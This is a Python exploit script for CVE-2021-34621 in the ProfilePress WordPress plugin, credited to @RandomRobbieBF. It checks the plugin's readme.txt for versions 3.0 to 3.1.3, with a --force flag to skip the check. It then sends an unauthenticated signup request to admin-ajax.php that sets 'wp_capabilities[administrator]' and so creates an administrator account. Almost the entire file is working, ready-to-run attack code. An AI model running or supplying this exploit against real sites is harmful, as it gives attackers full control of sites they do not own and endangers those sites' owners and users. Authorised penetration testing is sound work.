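from __future__ import annotations

import argparse
import os
import re

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

#
# Exploit script by @RandomRobbieBF
#
# CVE-2021-34621 - ProfilePress (wp-user-avatar plugin) 3.0 - 3.1.3,
# unauthenticated privilege escalation through the `pp_ajax_signup`
# registration handler. Run it only against hosts you are authorised to test.
#

# Optional outbound proxy, e.g. "http://127.0.0.1:8080" to route through Burp.
# Only exported when set: the original unconditionally wrote an empty string
# into HTTP_PROXY/HTTPS_PROXY, which requests ignores but which silently
# clobbers any proxy the operator already had configured in the shell.
http_proxy = ""
if http_proxy:
    os.environ['HTTP_PROXY'] = http_proxy
    os.environ['HTTPS_PROXY'] = http_proxy

# TLS certificate verification is deliberately disabled on every request
# (verify=False) because engagement targets are routinely self-signed; this
# means a MITM between you and the target can read the credentials you send.
# Silence the per-request warning so the output stays readable.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Set a real user agent
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
}

# Seconds to wait on connect/read; without it a stalled target hangs the
# script forever (requests has no default timeout).
REQUEST_TIMEOUT = 15

# Affected range, inclusive, as tuples so comparison is numeric per component.
AFFECTED_MIN = (3, 0)
AFFECTED_MAX = (3, 1, 3)

# "Stable tag: 3.0" and "Stable tag: 3.1.3" both match; the original pattern
# required exactly three components and therefore never recognised "3.0".
STABLE_TAG_RE = re.compile(r'Stable tag:\s*(\d+(?:\.\d+)*)')


def _version_tuple(version: str) -> tuple[int, ...]:
    """Turn '3.1.3' into (3, 1, 3) so versions compare numerically.

    Raises ValueError if any component is not an integer.
    """
    return tuple(int(part) for part in version.split('.'))


def is_affected_version(stable_tag: str | None) -> bool:
    """Return True when *stable_tag* lies in the vulnerable 3.0 - 3.1.3 range.

    The original compared version strings lexicographically, so '3.1.10'
    sorted below '3.1.3' and was wrongly reported as vulnerable. None, empty
    or non-numeric tags are treated as not affected.
    """
    if not stable_tag:
        return False
    try:
        parsed = _version_tuple(stable_tag)
    except ValueError:
        return False
    return AFFECTED_MIN <= parsed <= AFFECTED_MAX


def extract_stable_tag(wp_url):
    """Fetch the plugin's readme.txt and return its 'Stable tag' value, or None.

    Returns None when the request fails, the status is not 200, or no tag
    line is present. A trailing slash on *wp_url* is tolerated.

    NOTE: readme.txt advertises the shipped version, which is not proof of what
    is actually running (the file may be stale or blocked) — treat the result
    as a hint, and use --force when you have better evidence.
    """
    readme_url = wp_url.rstrip('/') + '/wp-content/plugins/wp-user-avatar/readme.txt'
    try:
        response = requests.get(
            readme_url, verify=False, headers=headers, timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException as exc:
        print('Error fetching readme:', exc)
        return None
    if response.status_code != 200:
        return None
    match = STABLE_TAG_RE.search(response.text)
    return match.group(1) if match else None


def main():
    """Parse arguments, fingerprint the plugin, and send the signup request.

    Exits with a message when the readme version is outside the affected range
    (unless --force is given). On success the raw response body is printed so
    the operator can see what the handler returned.
    """
    parser = argparse.ArgumentParser(description='CVE-2021-34621 - ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation')
    parser.add_argument('--url', required=True, help='WordPress URL')
    parser.add_argument('--username', required=True, help='Username')
    parser.add_argument('--email', required=True, help='Email')
    parser.add_argument('--password', required=True, help='Password')
    parser.add_argument('--force', action='store_true',
                        help='Send the request even if readme.txt is missing or out of range')
    args = parser.parse_args()

    stable_tag = extract_stable_tag(args.url)
    if not args.force and not is_affected_version(stable_tag):
        print('Stable tag is not within the specified range (3.0 - 3.1.3)')
        return

    # Registration form fields plus the capabilities key. Presumably the
    # vulnerable handler copies submitted fields into user meta unfiltered,
    # which is what lets wp_capabilities[administrator] take effect — the
    # script itself only shows the request, not the server-side cause.
    payload = {
        'reg_username': args.username,
        'reg_email': args.email,
        'reg_password': args.password,
        'reg_password_present': 'true',
        'reg_first_name': 'test',
        'reg_last_name': 'test',
        'wp_capabilities[administrator]': '1',
        'action': 'pp_ajax_signup',
        'melange_id': ''
    }
    try:
        response = requests.post(
            args.url.rstrip('/') + '/wp-admin/admin-ajax.php',
            data=payload, verify=False, headers=headers, timeout=REQUEST_TIMEOUT,
        )
    except requests.RequestException as exc:
        print('Error:', exc)
        return
    if response.status_code == 200:
        print(response.text)
    else:
        print('Error:', response.status_code)


if __name__ == '__main__':
    main()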